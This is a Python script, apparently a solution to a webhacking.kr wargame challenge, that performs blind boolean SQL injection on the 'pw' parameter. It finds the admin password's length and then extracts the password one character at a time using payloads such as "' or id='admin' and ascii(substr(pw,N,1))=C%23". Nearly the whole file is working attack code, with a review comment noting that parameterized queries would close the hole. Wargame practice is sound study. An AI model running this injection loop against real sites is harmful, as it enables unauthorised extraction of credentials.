import requests
# Base request for the wargame challenge page. Every probe built below is
# appended to the trailing `pw=` parameter.
url = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw='

# Session cookie sent with each request. The value is a placeholder
# ("your own session id") and must be replaced with the caller's own PHPSESSID.
cookie = {'PHPSESSID': '자신의 세션 id'}
def find_pw_len():
    """Return the first N for which the `length(pw)=N` probe is answered as true.

    Candidate lengths are tried from 1 upwards. A response body containing
    'wrong' is treated as the "condition held" signal. The loop has no upper
    bound, so it only ends once that marker appears.
    """
    candidate = 1
    while True:
        # '%23' is the URL-encoded '#'. A literal '#' would start the URL
        # fragment and never reach the server, so the trailing SQL comment
        # has to be sent percent-encoded for the PHP side to see '#'.
        probe = url + "' or id='admin' and length(pw)={}%23".format(candidate)
        reply = requests.get(probe, cookies=cookie)
        if 'wrong' not in reply.text:
            candidate += 1
            continue
        return candidate
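def find_pw():
    """Print the admin password, one character per line.

    For each position the ASCII codes 0-127 are tried in order. A response
    body containing 'wrong' is treated as the "condition held" signal, and
    the matching character is printed. Nothing is returned.

    The positions walked come from find_pw_len(). The loop previously used a
    hard-coded range(1, 37) and ignored the length it had just computed, which
    was only right for a 36-character value.

    NOTE(review): the probes only work because the response differs depending
    on an attacker-supplied boolean, which presumably means the server builds
    its SQL by string concatenation. A parameterized query on the server side
    would remove the oracle.
    """
    pw_len = find_pw_len()
    for position in range(1, pw_len + 1):
        for code in range(128):
            # '%23' is the URL-encoded '#', which ends the statement as a SQL comment.
            query = url + "' or id='admin' and ascii(substr(pw,{},1))={}%23".format(position, code)
            res = requests.get(query, cookies=cookie)
            if 'wrong' in res.text:
                print(chr(code))
                break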
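# Run the extraction only when this file is executed as a script, so that
# importing the module does not send any requests.
if __name__ == "__main__":
    find_pw()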